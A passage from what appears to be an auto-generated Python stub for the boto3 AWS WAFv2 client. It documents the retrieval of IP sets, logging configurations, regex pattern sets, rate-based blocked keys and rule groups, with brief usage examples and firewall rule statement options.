'LockToken': 'string'
}
:returns:
To configure AWS WAF to allow, block, or count requests that originated from the IP address 192.0.2.44, specify 192.0.2.44/32 .
To configure AWS WAF to allow, block, or count requests that originated from IP addresses from 192.0.2.0 to 192.0.2.255, specify 192.0.2.0/24 .
To configure AWS WAF to allow, block, or count requests that originated from the IP address 1111:0000:0000:0000:0000:0000:0000:0111, specify 1111:0000:0000:0000:0000:0000:0000:0111/128 .
To configure AWS WAF to allow, block, or count requests that originated from IP addresses 1111:0000:0000:0000:0000:0000:0000:0000 to 1111:0000:0000:0000:ffff:ffff:ffff:ffff, specify 1111:0000:0000:0000:0000:0000:0000:0000/64 .
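A minimal sketch with hypothetical identifiers, printing the configured CIDR blocks and keeping the lock token for a later update or delete:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
response = client.get_ip_set(Name='my-ip-set', Scope='REGIONAL', Id='example-ip-set-id')
ip_set = response['IPSet']
print(ip_set['Name'], ip_set['IPAddressVersion'])
for cidr in ip_set['Addresses']:
    print(cidr)
lock_token = response['LockToken']  # pass this to update_ip_set or delete_ip_set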
"""
pass
def get_logging_configuration(ResourceArn=None):
"""
Returns the LoggingConfiguration for the specified web ACL.
See also: AWS API Documentation
Exceptions
:example: response = client.get_logging_configuration(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the web ACL for which you want to get the LoggingConfiguration .\n
:rtype: dict
ReturnsResponse Syntax{
'LoggingConfiguration': {
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
}
Response Structure
(dict) --
LoggingConfiguration (dict) --The LoggingConfiguration for the specified web ACL.
ResourceArn (string) --The Amazon Resource Name (ARN) of the web ACL that you want to associate with LogDestinationConfigs .
LogDestinationConfigs (list) --The Amazon Kinesis Data Firehose Amazon Resource Name (ARNs) that you want to associate with the web ACL.
(string) --
RedactedFields (list) --The parts of the request that you want to keep out of the logs. For example, if you redact the cookie field, the cookie field in the firehose will be xxx .
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The part of a web request that you want AWS WAF to inspect. Include the single FieldToMatch type that you want to inspect, with additional specifications as needed, according to the type. You specify a single request component in FieldToMatch for each rule statement that requires it. To inspect more than one component of a web request, create a separate rule statement for each component.
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'LoggingConfiguration': {
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
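A minimal sketch; the web ACL ARN is a hypothetical placeholder:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
web_acl_arn = 'arn:aws:wafv2:us-east-1:123456789012:regional/webacl/my-web-acl/example-web-acl-id'
config = client.get_logging_configuration(ResourceArn=web_acl_arn)['LoggingConfiguration']
print('Firehose destinations:', config['LogDestinationConfigs'])
for field in config.get('RedactedFields', []):
    # Each redacted field is a FieldToMatch dict keyed by the part of the request.
    print('Redacted:', list(field.keys()))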
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
Returns: A paginator object.
"""
pass
def get_permission_policy(ResourceArn=None):
"""
Returns the IAM policy that is attached to the specified rule group.
You must be the owner of the rule group to perform this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.get_permission_policy(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the rule group for which you want to get the policy.\n
:rtype: dict
ReturnsResponse Syntax{
'Policy': 'string'
}
Response Structure
(dict) --
Policy (string) --The IAM policy that is attached to the specified rule group.
Exceptions
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
:return: {
'Policy': 'string'
}
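A minimal sketch; the Policy value is a JSON policy document returned as a string, so it can be parsed with the standard json module. The rule group ARN is hypothetical:
import json

import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
policy = client.get_permission_policy(
    ResourceArn='arn:aws:wafv2:us-east-1:123456789012:regional/rulegroup/my-rule-group/example-rule-group-id'
)['Policy']
print(json.dumps(json.loads(policy), indent=2))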
"""
pass
def get_rate_based_statement_managed_keys(Scope=None, WebACLName=None, WebACLId=None, RuleName=None):
"""
Retrieves the keys that are currently blocked by a rate-based rule. The maximum number of managed keys that can be blocked for a single rate-based rule is 10,000. If more than 10,000 addresses exceed the rate limit, those with the highest rates are blocked.
See also: AWS API Documentation
Exceptions
:example: response = client.get_rate_based_statement_managed_keys(
Scope='CLOUDFRONT'|'REGIONAL',
WebACLName='string',
WebACLId='string',
RuleName='string'
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type WebACLName: string
:param WebACLName: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type WebACLId: string
:param WebACLId: [REQUIRED]\nThe unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type RuleName: string
:param RuleName: [REQUIRED]\nThe name of the rate-based rule to get the keys for.\n
:rtype: dict
ReturnsResponse Syntax
{
'ManagedKeysIPV4': {
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
},
'ManagedKeysIPV6': {
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
}
}
Response Structure
(dict) --
ManagedKeysIPV4 (dict) --
The keys that are of Internet Protocol version 4 (IPv4).
IPAddressVersion (string) --
Addresses (list) --
The IP addresses that are currently blocked.
(string) --
ManagedKeysIPV6 (dict) --
The keys that are of Internet Protocol version 6 (IPv6).
IPAddressVersion (string) --
Addresses (list) --
The IP addresses that are currently blocked.
(string) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'ManagedKeysIPV4': {
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
},
'ManagedKeysIPV6': {
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
}
}
:returns:
(string) --
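A minimal sketch with hypothetical identifiers, listing the addresses currently blocked by a rate-based rule:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
response = client.get_rate_based_statement_managed_keys(
    Scope='REGIONAL',
    WebACLName='my-web-acl',
    WebACLId='example-web-acl-id',
    RuleName='my-rate-limit-rule'
)
print('Blocked IPv4:', response['ManagedKeysIPV4']['Addresses'])
print('Blocked IPv6:', response['ManagedKeysIPV6']['Addresses'])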
"""
pass
def get_regex_pattern_set(Name=None, Scope=None, Id=None):
"""
Retrieves the specified RegexPatternSet .
See also: AWS API Documentation
Exceptions
:example: response = client.get_regex_pattern_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the set. You cannot change the name after you create the set.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'RegexPatternSet': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'Description': 'string',
'RegularExpressionList': [
{
'RegexString': 'string'
},
]
},
'LockToken': 'string'
}
Response Structure
(dict) --
RegexPatternSet (dict) --
Name (string) --
The name of the set. You cannot change the name after you create the set.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Description (string) --
A description of the set that helps with identification. You cannot change the description of a set after you create it.
RegularExpressionList (list) --
The regular expression patterns in the set.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A single regular expression. This is used in a RegexPatternSet .
RegexString (string) --
The string representing the regular expression.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'RegexPatternSet': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'Description': 'string',
'RegularExpressionList': [
{
'RegexString': 'string'
},
]
},
'LockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
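A minimal sketch with hypothetical identifiers, printing each pattern and keeping the lock token for a later update_regex_pattern_set or delete_regex_pattern_set call:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
response = client.get_regex_pattern_set(Name='my-patterns', Scope='REGIONAL', Id='example-set-id')
for regex in response['RegexPatternSet']['RegularExpressionList']:
    print(regex['RegexString'])
lock_token = response['LockToken']  # required for a subsequent update or delete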
"""
pass
def get_rule_group(Name=None, Scope=None, Id=None):
"""
Retrieves the specified RuleGroup .
See also: AWS API Documentation
Exceptions
:example: response = client.get_rule_group(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the rule group. You cannot change the name of a rule group after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'RuleGroup': {
'Name': 'string',
'Id': 'string',
'Capacity': 123,
'ARN': 'string',
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
'LockToken': 'string'
}
Response Structure
(dict) --
RuleGroup (dict) --
Name (string) --
The name of the rule group. You cannot change the name of a rule group after you create it.
Id (string) --
A unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Capacity (integer) --
The web ACL capacity units (WCUs) required for this rule group.
When you create your own rule group, you define this, and you cannot change it after creation. When you add or modify the rules in a rule group, AWS WAF enforces this limit. You can check the capacity for a set of rules using CheckCapacity .
AWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Description (string) --
A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
Rules (list) --
The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.
Name (string) --
The name of the rule. You can\'t change the name of a Rule after you create it.
Priority (integer) --
If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.
Statement (dict) --
The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .
ByteMatchStatement (dict) --
A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is referred to as a string match statement.
SearchString (bytes) --
A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.
Valid values depend on the component that you specify for inspection in FieldToMatch :
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
If SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.
If you\'re using the AWS WAF API
Specify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.
For example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .
If you\'re using the AWS CLI or one of the AWS SDKs
The value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: \ " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
PositionalConstraint (string) --
The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:
CONTAINS
The specified part of the web request must include the value of SearchString , but the location doesn\'t matter.
CONTAINS_WORD
The specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:
SearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .
SearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .
EXACTLY
The value of the specified part of the web request must exactly match the value of SearchString .
STARTS_WITH
The value of SearchString must appear at the beginning of the specified part of the web request.
ENDS_WITH
The value of SearchString must appear at the end of the specified part of the web request.
SqliMatchStatement (dict) --
Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: \ " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh; , with the corresponding characters
